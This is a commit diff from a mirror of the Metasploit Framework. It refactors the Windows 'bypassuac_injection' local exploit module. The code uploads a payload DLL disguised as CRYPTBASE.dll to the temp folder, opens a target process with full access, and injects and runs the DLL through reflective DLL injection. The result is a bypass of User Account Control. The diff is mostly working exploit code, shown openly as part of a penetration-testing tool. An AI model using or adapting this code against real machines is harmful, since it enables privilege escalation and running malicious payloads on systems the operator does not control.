infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Further bypassuac tidies 

Dont rescue Exception
Use ReflectiveDLLInjection post mixin
Dont keep retrieving %TEMP% path
Meatballs 2014-02-25 22:03:01 +00:00
parent b1dfed8577
commit 6687ef80ee
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 11 additions and 32 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
modules/exploits/windows/local/bypassuac_injection.rb
View File

@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Local
include Exploit::EXE include Exploit::EXE
include Post::File include Post::File
include Post::Windows::Priv include Post::Windows::Priv
include Post::Windows::ReflectiveDLLInjection
def initialize(info={}) def initialize(info={})
super( update_info( info, super( update_info( info,
@ -124,14 +125,13 @@ class Metasploit3 < Msf::Exploit::Local
check_permissions! check_permissions!
@temp_path = expand_path('%TEMP%').strip
upload_payload_dll! upload_payload_dll!
dll = ''
File.open(bypass_dll_path, "rb" ) { |f| dll += f.read(f.stat.size) }
offset = get_reflective_dll_offset(dll)
pid = spawn_inject_proc pid = spawn_inject_proc
run_injection(pid, offset, dll)
run_injection(pid, bypass_dll_path)
# delete the uac bypass payload # delete the uac bypass payload
vprint_status("Cleaning up payload file...") vprint_status("Cleaning up payload file...")
@ -139,23 +139,8 @@ class Metasploit3 < Msf::Exploit::Local
end end
def payload_filepath(temp_path)
def get_reflective_dll_offset(dll) "#{@temp_path}\\CRYPTBASE.dll"
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
return pe.rva_to_file_offset( entry.rva )
end
end
raise "Can't find an exported ReflectiveLoader function!"
end
def payload_filepath
"#{expand_path("%TEMP%").strip}\\CRYPTBASE.dll"
end end
@ -174,20 +159,14 @@ class Metasploit3 < Msf::Exploit::Local
def run_injection(pid, offset, dll) def run_injection(pid, dll_path)
vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
begin begin
vprint_status("Opening process #{pid}") vprint_status("Opening process #{pid}")
host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
vprint_status("Allocating memory in procees #{pid}") exploit_mem, offset = inject_dll_into_process(host_process, dll_path)
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
# Ensure memory is set for execution
host_process.memory.protect(mem)
vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{dll.length} bytes")
vprint_status("Writing the payload into memory")
host_process.memory.write(mem, dll)
vprint_status("Executing payload") vprint_status("Executing payload")
thread = host_process.thread.create(mem+offset, 0) thread = host_process.thread.create(exploit_mem + offset, 0)
print_good("Successfully injected payload in to process: #{pid}") print_good("Successfully injected payload in to process: #{pid}")
client.railgun.kernel32.WaitForSingleObject(thread.handle,3000) client.railgun.kernel32.WaitForSingleObject(thread.handle,3000)
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
@ -219,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Local
begin begin
vprint_status("Payload DLL #{payload.length} bytes long being uploaded..") vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
write_file(payload_filepath, payload) write_file(payload_filepath, payload)
rescue ::Exception => e rescue Rex::Post::Meterpreter::RequestError => e
fail_with( fail_with(
Exploit::Exception::Unknown, Exploit::Exception::Unknown,
"Error uploading file #{payload_filepath}: #{e.class} #{e}" "Error uploading file #{payload_filepath}: #{e.class} #{e}"